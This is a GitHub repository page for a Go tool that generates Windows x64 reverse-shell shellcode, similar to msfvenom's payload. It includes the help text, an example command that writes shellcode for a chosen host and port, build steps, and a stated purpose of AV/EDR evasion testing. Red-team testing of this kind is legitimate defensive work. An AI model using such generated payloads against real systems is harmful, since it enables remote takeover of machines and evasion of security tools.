Skip to content

msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies

License

Notifications You must be signed in to change notification settings

nchgroup/shell_reverse_tcp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

shell_reverse_tcp

msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies

Help

$ ./shell_reverse_tcp -h
Usage of ./shell_reverse_tcp:
  -host string
        Host IP address (default "127.0.0.1")
  -port int
        Port number (0-65535) (default 4444)

Example

$ ./shell_reverse_tcp -host 192.168.100.100 -port 4444 > shellcode.bin

Build

git clone https://github.com/nchgroup/shell_reverse_tcp
cd shell_reverse_tcp/
go build .

Project spirit

Generate your payload in x64 quickly and easily without dependencies to perform AV/EDR evasion tests on Windows in amd64, so you can use encoders, ciphers, obfuscators, whatever.

ToDo

  • add language support, example: -lang c

Authors

Releases

No releases published

Packages

No packages published

Languages